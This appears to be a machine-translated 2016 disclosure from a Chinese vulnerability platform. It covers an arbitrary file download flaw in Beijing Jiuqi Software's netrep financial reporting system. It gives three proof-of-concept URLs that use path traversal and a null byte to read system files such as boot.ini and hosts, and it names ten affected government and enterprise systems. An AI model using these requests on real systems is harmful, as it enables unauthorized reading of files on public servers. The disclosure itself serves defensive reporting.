漏洞标题 任意财务文件系统任意文件下载漏洞 相关制造商 北京九七软件有限公司 漏洞作者 过路人 提交时间 2016-03-27 11: 30 公共时间 2016-06-29 10: 50 漏洞类型 任何文件遍历/下载 危险等级 在 自我评估等级 10 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 任何文件读取,netrep,北京九七软件 漏洞详细信息 PoC(仅限Windows): http://target/netrep/ebook/browse/download.jsp?jpgfilepath=c: \ boot.ini%00 \ jpg \ . \& outfiletype=xls http://target/netrep/ebook/browse/download.jsp?jpgfilepath=jpgfilepath=c: \ windows \ system32 \ drivers \ etc \ hosts%00 \ jpg \ . \& outfiletype=xls& outfiletype=xls http://target/netrep/ebook/browse/download.jsp?jpgfilepath=。\ StartWeblogic.sh%00 \ jpg \ . \& outfiletype=xls 漏洞证明: 以下系统确认存在此漏洞: 1)浙江省企业家庭快递在线直报系统:http://**。**。**。**/netrep / 2)中国通信集团财务报表管理信息系统:http://**。**。**。**/netrep / 3)河南省外商投资企业年度报告制度: **。**。**。**: 7005/netrep / 4)广西财务部企业财务会计信息网络报告系统: **。**。**。**: 7002/netrep / 5)河北省财政厅企业信息报告系统: **。**。**。**: 7001/netrep / 6)朝阳区财政局报告管理系统: **。**。**。**: 8001/netrep / 7)河南省财务会计最终会计数据收集系统: **。**。**。**: 7020/netrep / 8)经济开发区北京对外经济报告数据管理系统:http://**。**。**。**/netrep / 9)宁波市财务会计信息网络报告系统:http://**。**。**。**: 9020/netrep / 10)中国交通建设股份有限公司劳动管理报告管理系统: **。**。**。**/netrep / .
修理计划: 没有。 版权声明:请注明出处。居民A @乌云